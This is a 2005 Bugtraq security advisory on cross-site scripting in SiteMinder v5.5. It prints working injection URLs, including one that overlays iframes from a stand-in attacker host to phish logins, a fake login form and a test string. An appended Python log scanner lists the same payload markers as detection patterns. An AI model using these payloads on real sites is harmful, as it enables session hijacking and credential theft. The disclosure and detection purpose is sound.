
List:       bugtraq
Subject:    SiteMinder Multiple Vulnerabilities
From:       c0ntexb () gmail ! com
Date:       2005-07-08 14:03:11
Message-ID: 20050708140311.20979.qmail () securityfocus ! com

 /*
  *****************************************************************************************************************
  $ An open security advisory #10 - Siteminder v5.5 Vulnerabilities
  *****************************************************************************************************************
  1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
  2: Bug Released: July 08 2005
  3: Bug Impact Rate: Medium / Hi
  4: Bug Scope Rate: Remote
  *****************************************************************************************************************
  $ This advisory and/or proof of concept code must not be used for commercial gain.
  *****************************************************************************************************************


  Siteminder
  http://www3.ca.com/Solutions/Product.asp?ID=5262

  "eTrust™ SiteMinder® is a market-leading security and management foundation for enterprise Web applications with a centralized security infrastructure for managing user authentication and access. eTrust SiteMinder delivers the market's most advanced security management capabilities and enterprise-class site administration, reducing overall IT operational cost and complexity. eTrust SiteMinder enables the secure delivery of essential information and applications to employees, partners, suppliers and customers, and scales with growing business needs."

  SiteMinder is vulnerable to cross-site scripting (XSS): a user can inject HTML or JavaScript into various locations in a URL or input field and have it execute in the victim's browser. This can be used to perform phishing attacks, hijack users' browser sessions, or capture account credentials by redrawing the login page of a site.

  http://vuln/siteminderagent/pwcgi/smpwservicescgi.exe?SMAUTHREASON=0&TARGET=&USERNAME=hacker&PASSWORD="><script>alert(document.cookie)</script>&BUFFER="><script>alert("Vulnerable")</script>


  The following link abuses the TARGET URL option. It first logs the user out of the site with a timeout error, because the user is sent off to another HTTPS site, which takes the user back to the login page. Next, an IFRAME is opened over the original login fields with malicious Username and Password input fields, so the user supplies their login details to a malicious site, where they can be harvested later and used in an attack.

  http://site.com/siteminderagent/forms/login.fcc?TYPE=1&REALMOID=01-000000000-000000-0010-0000-0000000000000&GUID=&SMAUTHREASON=32&TARGET=http://site.com/servlet/yum/eat/user.html"><iframe bgcolor="white" src="https://attacker/snoop.html" style="position: absolute; top: 270px; left: 15 px;"></iframe><iframe src="https://attacker/snoop.html" style="position: absolute; top: 270px; left: 15 px;"></iframe>

  To test whether you are vulnerable to this issue, append the following to the end of a SiteMinder URL. If it is successful, you should see the Google homepage within an IFRAME.

  "><iframe bgcolor="white" src="http://www.google.com" style="position: absolute; top: 270px; left: 15 px;"></iframe><iframe src="http://www.google.com" style="position: absolute; top: 270px; left: 15 px;"></iframe>


  /* snoop.html */
  <html>
    <head></head>
  <body>
    <form>
     User ID
      <input type="text" name="UserID">
     <br>
     Password:
      <input type="text" name="Password">
      <input type="submit" value="Submit">
    </form>
  </body>
  </html>


  I have contacted Netegrity via ca.com multiple times but received no response, as such, users should use a filtering technology like modsecurity to detect the above described attacks until a fix has been released.
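As an added defender-side example (not from the advisory, nor CA/Netegrity code), the Python below applies the filtering idea above: it parses web-server access-log lines, decodes the query parameters the advisory names on the two agent endpoints, and flags any that carry markup; render_field shows the server-side fix, HTML-encoding a reflected value before it is emitted. The sample log lines and the marker list are constructed assumptions.

```python
import re
from html import escape
from urllib.parse import parse_qs, unquote, urlsplit

# Query parameters the advisory shows reflected unescaped into SiteMinder pages.
REFLECTED_PARAMS = {"SMAUTHREASON", "TARGET", "USERNAME", "PASSWORD", "BUFFER"}
# Agent endpoints named in the advisory.
ENDPOINTS = ("/siteminderagent/pwcgi/smpwservicescgi.exe",
             "/siteminderagent/forms/login.fcc")
# Markup fragments that never belong in these parameters (assumed list, checked after decoding).
MARKERS = ("<script", "<iframe", "javascript:", "onerror=", "onload=", '">')
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def suspicious_params(url: str) -> dict:
    """Return {PARAM: decoded value} for reflected parameters that carry markup."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith(ENDPOINTS):
        return {}
    hits = {}
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name.upper() not in REFLECTED_PARAMS:
            continue
        for value in values:
            # parse_qs decoded once; decode again to catch %2522%253E-style double encoding.
            if any(m in unquote(value).lower() for m in MARKERS):
                hits[name.upper()] = value
    return hits

def scan_access_log(lines):
    """Yield (line_number, hits) for each log line whose request URI is suspicious."""
    for lineno, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        hits = suspicious_params(m.group(1)) if m else {}
        if hits:
            yield lineno, hits

def render_field(name: str, value: str) -> str:
    """Server-side fix: HTML-encode a reflected value before emitting it into markup."""
    return '<input type="text" name="%s" value="%s">' % (
        escape(name, quote=True), escape(value, quote=True))

# Constructed sample log lines (not real traffic): one benign, two matching the advisory.
SAMPLE_LOG = [
    '10.0.0.5 - - [08/Jul/2005:14:03:11 +0000] "GET /siteminderagent/forms/login.fcc?TYPE=1&TARGET=%2Fhome HTTP/1.1" 200 512',
    '10.0.0.9 - - [08/Jul/2005:14:04:02 +0000] "GET /siteminderagent/pwcgi/smpwservicescgi.exe?SMAUTHREASON=0&USERNAME=hacker&PASSWORD=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 804',
    '10.0.0.9 - - [08/Jul/2005:14:05:30 +0000] "GET /siteminderagent/forms/login.fcc?SMAUTHREASON=32&TARGET=http://site.com/user.html%2522%253E%253Ciframe%2520src=https://attacker/snoop.html%253E HTTP/1.1" 200 1190',
]
```

Running `list(scan_access_log(SAMPLE_LOG))` flags lines 2 and 3 (PASSWORD and TARGET respectively); the same check can be run over a live log tail or turned into a request filter rule.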

